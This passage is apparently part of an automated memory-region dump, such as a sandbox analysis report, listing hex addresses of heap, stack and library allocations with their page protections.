page execute and read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
1CAD8DA0000
|
trusted library allocation
|
page read and write
|
||
20567ADC000
|
heap
|
page read and write
|
||
1FEF000
|
stack
|
page read and write
|
||
7DA96FB000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD6489000
|
heap
|
page read and write
|
||
15EB000
|
heap
|
page read and write
|
||
20566BB4000
|
heap
|
page read and write
|
||
1A5EA514000
|
heap
|
page read and write
|
||
2056BE11000
|
trusted library allocation
|
page read and write
|
||
14E33C10000
|
heap
|
page read and write
|
||
28A0FE000
|
stack
|
page read and write
|
||
1CAD8C25000
|
trusted library allocation
|
page read and write
|
||
1CAD8C1A000
|
trusted library allocation
|
page read and write
|
||
1CAD8909000
|
heap
|
page read and write
|
||
15E8000
|
heap
|
page execute and read and write
|
||
1887EC9B000
|
heap
|
page read and write
|
||
1872620D000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
14E4DDA7000
|
heap
|
page read and write
|
||
2056BE01000
|
trusted library allocation
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
1C2D42F7000
|
heap
|
page read and write
|
||
1CAD6478000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD89E9000
|
heap
|
page read and write
|
||
289DFE000
|
stack
|
page read and write
|
||
14E33E50000
|
heap
|
page read and write
|
||
20567B22000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
205679B3000
|
heap
|
page read and write
|
||
3929000
|
heap
|
page read and write
|
||
1872620E000
|
heap
|
page read and write
|
||
1CAD88F7000
|
heap
|
page read and write
|
||
17210FD000
|
stack
|
page read and write
|
||
18726170000
|
heap
|
page read and write
|
||
8347F7E000
|
stack
|
page read and write
|
||
7FFD9B3A0000
|
trusted library allocation
|
page read and write
|
||
1B9A7D89000
|
heap
|
page read and write
|
||
2CA5AFB000
|
stack
|
page read and write
|
||
2056798D000
|
heap
|
page read and write
|
||
1CAD67E1000
|
heap
|
page read and write
|
||
1B9A7CC7000
|
heap
|
page read and write
|
||
2056C040000
|
heap
|
page read and write
|
||
1760C540000
|
trusted library allocation
|
page read and write
|
||
1CAD6485000
|
heap
|
page read and write
|
||
18800DD5000
|
trusted library allocation
|
page read and write
|
||
1CAD8B10000
|
trusted library allocation
|
page read and write
|
||
15EF000
|
heap
|
page read and write
|
||
20567B8A000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1A5EA1F0000
|
trusted library allocation
|
page read and write
|
||
42FB000
|
direct allocation
|
page read and write
|
||
1CAD6481000
|
heap
|
page read and write
|
||
14E35CB3000
|
trusted library allocation
|
page read and write
|
||
1A5EA222000
|
trusted library allocation
|
page read and write
|
||
14E45C48000
|
trusted library allocation
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
20567A90000
|
heap
|
page read and write
|
||
1B9A5D12000
|
heap
|
page read and write
|
||
14E37B83000
|
trusted library allocation
|
page read and write
|
||
2056BC31000
|
heap
|
page read and write
|
||
14E35AB4000
|
heap
|
page read and write
|
||
41B4000
|
direct allocation
|
page read and write
|
||
1C2D4160000
|
heap
|
page read and write
|
||
1B9A5D00000
|
heap
|
page read and write
|
||
1872622B000
|
heap
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
188102F0000
|
trusted library allocation
|
page read and write
|
||
1B9A76A0000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056C283000
|
trusted library allocation
|
page read and write
|
||
14E33CBF000
|
heap
|
page read and write
|
||
3D94000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
172117E000
|
stack
|
page read and write
|
||
157E000
|
heap
|
page read and write
|
||
2CA5EFE000
|
unkown
|
page readonly
|
||
3CE4000
|
heap
|
page read and write
|
||
1CAD8E6D000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD60B8000
|
trusted library allocation
|
page read and write
|
||
18726237000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
14E4DCC7000
|
heap
|
page execute and read and write
|
||
205679A5000
|
heap
|
page read and write
|
||
1CAD6550000
|
trusted library allocation
|
page read and write
|
||
1887CA85000
|
heap
|
page read and write
|
||
172147E000
|
stack
|
page read and write
|
||
1A5EA300000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5EA4FD000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
2056BC36000
|
heap
|
page read and write
|
||
1CAD8E60000
|
trusted library allocation
|
page read and write
|
||
18726463000
|
heap
|
page read and write
|
||
1CAD682E000
|
heap
|
page read and write
|
||
15A7000
|
heap
|
page read and write
|
||
1B9A83A4000
|
trusted library allocation
|
page read and write
|
||
1CAD646A000
|
heap
|
page read and write
|
||
7FFD9B240000
|
trusted library allocation
|
page read and write
|
||
14E45F2D000
|
trusted library allocation
|
page read and write
|
||
24648BB000
|
stack
|
page read and write
|
||
20566CC8000
|
trusted library allocation
|
page read and write
|
||
1CAD8E76000
|
trusted library allocation
|
page read and write
|
||
7FFD9B310000
|
trusted library allocation
|
page read and write
|
||
1887EC89000
|
heap
|
page read and write
|
||
14E360E9000
|
trusted library allocation
|
page read and write
|
||
1CAD8C16000
|
trusted library allocation
|
page read and write
|
||
7FFD9B13C000
|
trusted library allocation
|
page execute and read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B0A0000
|
trusted library allocation
|
page read and write
|
||
3925000
|
heap
|
page read and write
|
||
1A5EA130000
|
trusted library allocation
|
page read and write
|
||
1CAD6498000
|
heap
|
page read and write
|
||
15C9000
|
heap
|
page read and write
|
||
1CAD67E5000
|
heap
|
page read and write
|
||
1C2D4140000
|
heap
|
page read and write
|
||
28991F000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D5D64000
|
heap
|
page read and write
|
||
2056BE10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B3B0000
|
trusted library allocation
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
7FFD9B25A000
|
trusted library allocation
|
page read and write
|
||
1A5EA1B1000
|
trusted library allocation
|
page read and write
|
||
1FD64F9D000
|
heap
|
page read and write
|
||
1CAD67E9000
|
heap
|
page read and write
|
||
187262AB000
|
heap
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
15CD000
|
heap
|
page read and write
|
||
2CA59FE000
|
unkown
|
page readonly
|
||
14E33D70000
|
heap
|
page read and write
|
||
7FFD9BB44000
|
trusted library allocation
|
page read and write
|
||
20567B06000
|
heap
|
page read and write
|
||
1880118C000
|
trusted library allocation
|
page read and write
|
||
1CAD6433000
|
heap
|
page read and write
|
||
1CAD6800000
|
heap
|
page read and write
|
||
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
1CAD6830000
|
heap
|
page read and write
|
||
1FD6501F000
|
heap
|
page read and write
|
||
1672000
|
heap
|
page read and write
|
||
1CAD6553000
|
trusted library allocation
|
page read and write
|
||
14E45CA4000
|
trusted library allocation
|
page read and write
|
||
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
7FFD9B092000
|
trusted library allocation
|
page read and write
|
||
20566CD5000
|
trusted library allocation
|
page read and write
|
||
1CAD8DE0000
|
trusted library allocation
|
page execute
|
||
1CAD6489000
|
heap
|
page read and write
|
||
7FFD9B094000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1FD65026000
|
heap
|
page read and write
|
||
7FFD9B340000
|
trusted library allocation
|
page read and write
|
||
1760C779000
|
trusted library allocation
|
page read and write
|
||
1CAD890F000
|
heap
|
page read and write
|
||
1616000
|
heap
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
7FFD9B310000
|
trusted library allocation
|
page read and write
|
||
187262B5000
|
heap
|
page read and write
|
||
188012A6000
|
trusted library allocation
|
page read and write
|
||
1CAD8E72000
|
trusted library allocation
|
page read and write
|
||
7FFD9B1A0000
|
trusted library allocation
|
page execute and read and write
|
||
16BC000
|
heap
|
page read and write
|
||
14E46F9B000
|
trusted library allocation
|
page read and write
|
||
1881002D000
|
trusted library allocation
|
page read and write
|
||
834853E000
|
stack
|
page read and write
|
||
1CAD6551000
|
trusted library allocation
|
page read and write
|
||
1CAD89C2000
|
heap
|
page read and write
|
||
1B9A834A000
|
trusted library allocation
|
page read and write
|
||
3E26000
|
heap
|
page read and write
|
||
20567991000
|
heap
|
page read and write
|
||
14E37B75000
|
trusted library allocation
|
page read and write
|
||
1575000
|
heap
|
page read and write
|
||
163D000
|
heap
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
2056BCE8000
|
trusted library allocation
|
page read and write
|
||
12D9000
|
heap
|
page read and write
|
||
1CAD8B35000
|
trusted library allocation
|
page read and write
|
||
1CAD6118000
|
trusted library allocation
|
page read and write
|
||
28ADCB000
|
stack
|
page read and write
|
||
1CAD8A3A000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
14E33EC5000
|
heap
|
page read and write
|
||
7FFD9B4F0000
|
trusted library allocation
|
page read and write
|
||
1C2D4287000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
1A5E4C00000
|
heap
|
page read and write
|
||
14E4DF10000
|
trusted library allocation
|
page read and write
|
||
18726214000
|
heap
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
20567B2F000
|
heap
|
page read and write
|
||
1CAD67E9000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
15F1000
|
heap
|
page read and write
|
||
7DF412520000
|
trusted library allocation
|
page readonly
|
||
1613000
|
heap
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
1A5EA4D6000
|
heap
|
page read and write
|
||
1A5EA295000
|
trusted library allocation
|
page read and write
|
||
3CEE000
|
heap
|
page read and write
|
||
17624970000
|
heap
|
page execute and read and write
|
||
1B9A5D08000
|
heap
|
page read and write
|
||
1CAD8C12000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B0A0000
|
trusted library allocation
|
page read and write
|
||
1C5E000
|
stack
|
page read and write
|
||
20567991000
|
heap
|
page read and write
|
||
3D8A000
|
heap
|
page read and write
|
||
1A5EA4EE000
|
heap
|
page read and write
|
||
7FFD9B093000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B09D000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD6472000
|
heap
|
page read and write
|
||
20567B22000
|
heap
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
20567B0F000
|
heap
|
page read and write
|
||
1887C7FD000
|
heap
|
page read and write
|
||
7FFD9B510000
|
trusted library allocation
|
page read and write
|
||
2CA57FB000
|
stack
|
page read and write
|
||
7FFD9B440000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
17624997000
|
heap
|
page execute and read and write
|
||
18726238000
|
heap
|
page read and write
|
||
28A1FE000
|
stack
|
page read and write
|
||
1CAD64F0000
|
trusted library allocation
|
page read and write
|
||
83481FF000
|
stack
|
page read and write
|
||
1CAD6483000
|
heap
|
page read and write
|
||
1A5E4C9D000
|
heap
|
page read and write
|
||
14E4DD96000
|
heap
|
page read and write
|
||
39CB000
|
heap
|
page read and write
|
||
15CC000
|
heap
|
page read and write
|
||
7FFD9B3C0000
|
trusted library allocation
|
page read and write
|
||
1887C750000
|
heap
|
page read and write
|
||
1A5EA50A000
|
heap
|
page read and write
|
||
1FD64F9D000
|
heap
|
page read and write
|
||
14E33CC6000
|
heap
|
page read and write
|
||
17624856000
|
heap
|
page read and write
|
||
4088000
|
direct allocation
|
page read and write
|
||
172157B000
|
stack
|
page read and write
|
||
1B9A76C0000
|
trusted library allocation
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
20567B8D000
|
heap
|
page read and write
|
||
1A5EA1F4000
|
trusted library allocation
|
page read and write
|
||
1CAD8C1C000
|
trusted library allocation
|
page read and write
|
||
7DA88FE000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8AEC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B390000
|
trusted library allocation
|
page read and write
|
||
20567990000
|
heap
|
page read and write
|
||
1CAD8C20000
|
trusted library allocation
|
page read and write
|
||
1B9A7720000
|
heap
|
page read and write
|
||
20F8000
|
heap
|
page read and write
|
||
1760C660000
|
heap
|
page read and write
|
||
1CAD8E7B000
|
trusted library allocation
|
page read and write
|
||
1A5EA44F000
|
heap
|
page read and write
|
||
1A5EA1E0000
|
trusted library allocation
|
page read and write
|
||
205679A5000
|
heap
|
page read and write
|
||
2056BBFB000
|
heap
|
page read and write
|
||
14E38560000
|
trusted library allocation
|
page read and write
|
||
2056BCBC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B2E0000
|
trusted library allocation
|
page read and write
|
||
3E12000
|
heap
|
page read and write
|
||
1887E7D0000
|
trusted library allocation
|
page read and write
|
||
1240000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1A5EA1B0000
|
trusted library allocation
|
page read and write
|
||
2056C1E0000
|
trusted library allocation
|
page read and write
|
||
1C2D42FA000
|
heap
|
page read and write
|
||
1CAD67EE000
|
heap
|
page read and write
|
||
1FD65026000
|
heap
|
page read and write
|
||
1CAD6485000
|
heap
|
page read and write
|
||
1C2D42DD000
|
heap
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
205679C7000
|
heap
|
page read and write
|
||
2056C290000
|
trusted library allocation
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
1887CA76000
|
heap
|
page execute and read and write
|
||
1872626E000
|
heap
|
page read and write
|
||
1CAD67B0000
|
heap
|
page read and write
|
||
18726236000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B500000
|
trusted library allocation
|
page execute and read and write
|
||
1B9A7EA3000
|
trusted library allocation
|
page read and write
|
||
1CAD6467000
|
heap
|
page read and write
|
||
1CAD8E74000
|
trusted library allocation
|
page read and write
|
||
9EE87FE000
|
stack
|
page read and write
|
||
2056C180000
|
trusted library allocation
|
page execute
|
||
1B9A8208000
|
trusted library allocation
|
page read and write
|
||
7FFD9B0BB000
|
trusted library allocation
|
page read and write
|
||
1FD6503C000
|
heap
|
page read and write
|
||
1CAD8E6E000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679AF000
|
heap
|
page read and write
|
||
1B9A7760000
|
heap
|
page read and write
|
||
1CAD6810000
|
heap
|
page read and write
|
||
1887E670000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1887C6E0000
|
heap
|
page read and write
|
||
1A5EA455000
|
heap
|
page read and write
|
||
20567B2F000
|
heap
|
page read and write
|
||
18726236000
|
heap
|
page read and write
|
||
7FFD9B47C000
|
trusted library allocation
|
page read and write
|
||
11EF000
|
stack
|
page read and write
|
||
164B000
|
heap
|
page read and write
|
||
1887ECC2000
|
heap
|
page read and write
|
||
14E376B2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B2F0000
|
trusted library allocation
|
page read and write
|
||
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
205679C7000
|
heap
|
page read and write
|
||
1CAD6447000
|
heap
|
page read and write
|
||
1CAD63BA000
|
heap
|
page read and write
|
||
23D000
|
unkown
|
page read and write
|
||
1A5EA4F6000
|
heap
|
page read and write
|
||
14E37A99000
|
trusted library allocation
|
page read and write
|
||
7FFD9B156000
|
trusted library allocation
|
page read and write
|
||
4473000
|
direct allocation
|
page read and write
|
||
14E4DDF3000
|
heap
|
page read and write
|
||
1CAD65C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8901000
|
heap
|
page read and write
|
||
1C2D4218000
|
heap
|
page read and write
|
||
14E37EE2000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8B35000
|
trusted library allocation
|
page read and write
|
||
1B9A7F9D000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD67E9000
|
heap
|
page read and write
|
||
14E9000
|
heap
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
246417F000
|
stack
|
page read and write
|
||
1CAD8A33000
|
heap
|
page read and write
|
||
1CAD6800000
|
heap
|
page read and write
|
||
18726221000
|
heap
|
page read and write
|
||
3D82000
|
heap
|
page read and write
|
||
7FFD9B530000
|
trusted library allocation
|
page read and write
|
||
1CAD8C19000
|
trusted library allocation
|
page read and write
|
||
7FFD9B330000
|
trusted library allocation
|
page read and write
|
||
2056C180000
|
trusted library allocation
|
page read and write
|
||
7FFD9B222000
|
trusted library allocation
|
page read and write
|
||
1887EB70000
|
heap
|
page read and write
|
||
15AD000
|
heap
|
page read and write
|
||
1A5EA2A1000
|
trusted library allocation
|
page read and write
|
||
437C000
|
direct allocation
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
14E33CCC000
|
heap
|
page read and write
|
||
14E385AC000
|
trusted library allocation
|
page read and write
|
||
1762488E000
|
heap
|
page read and write
|
||
1FD64FD5000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
14E4DCC0000
|
heap
|
page execute and read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
1CAD8E69000
|
trusted library allocation
|
page read and write
|
||
1CAD6485000
|
heap
|
page read and write
|
||
20567956000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1A5EA4F6000
|
heap
|
page read and write
|
||
205679C8000
|
heap
|
page read and write
|
||
14E35C31000
|
trusted library allocation
|
page read and write
|
||
1CAD647F000
|
heap
|
page read and write
|
||
1CAD88E9000
|
heap
|
page read and write
|
||
1B9A76B0000
|
heap
|
page readonly
|
||
1CAD60C8000
|
trusted library allocation
|
page read and write
|
||
18726238000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD89F7000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
18726223000
|
heap
|
page read and write
|
||
18726269000
|
heap
|
page read and write
|
||
2056BE15000
|
trusted library allocation
|
page read and write
|
||
20567B77000
|
heap
|
page read and write
|
||
1CAD646A000
|
heap
|
page read and write
|
||
14E4DCD0000
|
heap
|
page read and write
|
||
2CA567E000
|
stack
|
page read and write
|
||
9EE83FE000
|
stack
|
page read and write
|
||
14E33D73000
|
heap
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
18726212000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
20566D68000
|
trusted library allocation
|
page read and write
|
||
3954000
|
heap
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
187261F9000
|
heap
|
page read and write
|
||
2056AD40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B14C000
|
trusted library allocation
|
page execute and read and write
|
||
25E06FD000
|
stack
|
page read and write
|
||
1CAD8DE0000
|
trusted library allocation
|
page read and write
|
||
1CAD8C03000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
20567B39000
|
heap
|
page read and write
|
||
18726218000
|
heap
|
page read and write
|
||
1C2D5BB3000
|
heap
|
page read and write
|
||
18801673000
|
trusted library allocation
|
page read and write
|
||
2CA4BFE000
|
unkown
|
page readonly
|
||
83487BB000
|
stack
|
page read and write
|
||
20566CF9000
|
trusted library allocation
|
page read and write
|
||
1CAD8A35000
|
heap
|
page read and write
|
||
7FFD9B444000
|
trusted library allocation
|
page read and write
|
||
7FFD9B0A4000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5EA120000
|
trusted library allocation
|
page read and write
|
||
1619000
|
heap
|
page read and write
|
||
20567B8D000
|
heap
|
page read and write
|
||
2056BC36000
|
heap
|
page read and write
|
||
20567B03000
|
heap
|
page read and write
|
||
14E35670000
|
trusted library allocation
|
page read and write
|
||
1760C1D5000
|
heap
|
page read and write
|
||
3D99000
|
heap
|
page read and write
|
||
245000
|
unkown
|
page readonly
|
||
14E356F4000
|
heap
|
page read and write
|
||
2056ADA2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B150000
|
trusted library allocation
|
page execute and read and write
|
||
1B9A5DBF000
|
heap
|
page read and write
|
||
20567AFF000
|
heap
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
1CAD8E78000
|
trusted library allocation
|
page read and write
|
||
1CAD8B20000
|
trusted library allocation
|
page read and write
|
||
7FFD9B370000
|
trusted library allocation
|
page read and write
|
||
18801669000
|
trusted library allocation
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
1761C671000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1872622B000
|
heap
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
7FFD9B300000
|
trusted library allocation
|
page read and write
|
||
1887CA87000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD6475000
|
heap
|
page read and write
|
||
25E08FE000
|
stack
|
page read and write
|
||
15E8000
|
heap
|
page read and write
|
||
20567B08000
|
heap
|
page read and write
|
||
1CAD8E00000
|
heap
|
page readonly
|
||
20567B4D000
|
heap
|
page read and write
|
||
1CAD63CB000
|
heap
|
page read and write
|
||
18726211000
|
heap
|
page read and write
|
||
246447D000
|
stack
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
417C000
|
direct allocation
|
page read and write
|
||
20567B20000
|
heap
|
page read and write
|
||
1CAD67F8000
|
heap
|
page read and write
|
||
187262AD000
|
heap
|
page read and write
|
||
158A000
|
heap
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
1B9A5DAF000
|
heap
|
page read and write
|
||
1C2D5B94000
|
heap
|
page read and write
|
||
1CAD63BE000
|
heap
|
page read and write
|
||
14E45C4F000
|
trusted library allocation
|
page read and write
|
||
1CAD63EF000
|
heap
|
page read and write
|
||
1CAD8930000
|
heap
|
page read and write
|
||
7FFD9B2A0000
|
trusted library allocation
|
page read and write
|
||
1CAD6807000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
14E4DF80000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
158A000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567B08000
|
heap
|
page read and write
|
||
1CAD645E000
|
heap
|
page read and write
|
||
205679CC000
|
heap
|
page read and write
|
||
2CA55FE000
|
unkown
|
page readonly
|
||
1A5EA190000
|
trusted library allocation
|
page read and write
|
||
2CA48FE000
|
stack
|
page read and write
|
||
172107E000
|
stack
|
page read and write
|
||
3D73000
|
heap
|
page read and write
|
||
17213FE000
|
stack
|
page read and write
|
||
2056C0A0000
|
trusted library allocation
|
page read and write
|
||
14E4DFBB000
|
heap
|
page read and write
|
||
1CAD8E7A000
|
trusted library allocation
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
187261D0000
|
heap
|
page read and write
|
||
20567B46000
|
heap
|
page read and write
|
||
1720E7E000
|
stack
|
page read and write
|
||
7FFD9B400000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7DF4BCEB0000
|
trusted library allocation
|
page execute and read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1B9A7E70000
|
heap
|
page execute and read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
2CA53FE000
|
unkown
|
page readonly
|
||
1661000
|
heap
|
page read and write
|
||
20567B3D000
|
heap
|
page read and write
|
||
1887C7BF000
|
heap
|
page read and write
|
||
20567030000
|
heap
|
page read and write
|
||
171000
|
unkown
|
page execute read
|
||
205679C6000
|
heap
|
page read and write
|
||
2056ACC5000
|
trusted library allocation
|
page read and write
|
||
1FD64DF0000
|
heap
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
1CAD8C1F000
|
trusted library allocation
|
page read and write
|
||
1721277000
|
stack
|
page read and write
|
||
1B9A7EEB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
BCE000
|
stack
|
page read and write
|
||
1FD64F9C000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5E4C27000
|
heap
|
page read and write
|
||
14E4DFF6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BE12000
|
trusted library allocation
|
page read and write
|
||
2056C080000
|
trusted library allocation
|
page read and write
|
||
1C2D42DD000
|
heap
|
page read and write
|
||
2056BC54000
|
heap
|
page read and write
|
||
18800001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B24A000
|
trusted library allocation
|
page read and write
|
||
20567B1B000
|
heap
|
page read and write
|
||
20567AF8000
|
heap
|
page read and write
|
||
20566D68000
|
trusted library allocation
|
page read and write
|
||
2056BBFB000
|
heap
|
page read and write
|
||
245000
|
unkown
|
page readonly
|
||
205679C6000
|
heap
|
page read and write
|
||
20567B24000
|
heap
|
page read and write
|
||
1A5E4C13000
|
heap
|
page read and write
|
||
1B9A76D7000
|
heap
|
page execute and read and write
|
||
187261D8000
|
heap
|
page read and write
|
||
14E33C94000
|
heap
|
page read and write
|
||
1FD65230000
|
heap
|
page read and write
|
||
1760A773000
|
heap
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
1CAD649A000
|
heap
|
page read and write
|
||
11BE000
|
stack
|
page read and write
|
||
1CAD8930000
|
heap
|
page read and write
|
||
1A5EA2E0000
|
trusted library allocation
|
page read and write
|
||
1B9A5BE0000
|
heap
|
page read and write
|
||
7FFD9B4B0000
|
trusted library allocation
|
page execute and read and write
|
||
1887EC63000
|
heap
|
page read and write
|
||
18726140000
|
heap
|
page read and write
|
||
1C2D5BAE000
|
heap
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD67F7000
|
heap
|
page read and write
|
||
7FFD9B23A000
|
trusted library allocation
|
page read and write
|
||
2056BD18000
|
trusted library allocation
|
page read and write
|
||
20567B20000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1760A640000
|
heap
|
page read and write
|
||
16B6000
|
heap
|
page read and write
|
||
7DF4BCEC0000
|
trusted library allocation
|
page execute and read and write
|
||
1872629B000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
28A179000
|
stack
|
page read and write
|
||
1880162C000
|
trusted library allocation
|
page read and write
|
||
1CAD6475000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
3CF7000
|
heap
|
page read and write
|
||
20567B75000
|
heap
|
page read and write
|
||
188012FF000
|
trusted library allocation
|
page read and write
|
||
1A5EA462000
|
heap
|
page read and write
|
||
1C2D4060000
|
heap
|
page read and write
|
||
2056BC78000
|
heap
|
page read and write
|
||
1CAD8C07000
|
trusted library allocation
|
page read and write
|
||
7FFD9B300000
|
trusted library allocation
|
page read and write
|
||
7DF42D520000
|
trusted library allocation
|
page execute and read and write
|
||
9EE81FC000
|
stack
|
page read and write
|
||
1CAD63CD000
|
heap
|
page read and write
|
||
241000
|
unkown
|
page write copy
|
||
20567B06000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
172214B000
|
stack
|
page read and write
|
||
18726234000
|
heap
|
page read and write
|
||
1A5EA300000
|
trusted library allocation
|
page read and write
|
||
7FFD9B420000
|
trusted library allocation
|
page read and write
|
||
7FFD9B470000
|
trusted library allocation
|
page read and write
|
||
1CAD6481000
|
heap
|
page read and write
|
||
1610000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
18726229000
|
heap
|
page read and write
|
||
20567976000
|
heap
|
page read and write
|
||
2056BBFB000
|
heap
|
page read and write
|
||
1CAD8B35000
|
trusted library allocation
|
page read and write
|
||
1CAD8C17000
|
trusted library allocation
|
page read and write
|
||
15A2000
|
heap
|
page read and write
|
||
1A5EA1C8000
|
trusted library allocation
|
page read and write
|
||
2056BAB1000
|
heap
|
page read and write
|
||
2056C140000
|
trusted library allocation
|
page read and write
|
||
1C2D41D0000
|
trusted library allocation
|
page read and write
|
||
1CAD643A000
|
heap
|
page read and write
|
||
1633000
|
heap
|
page read and write
|
||
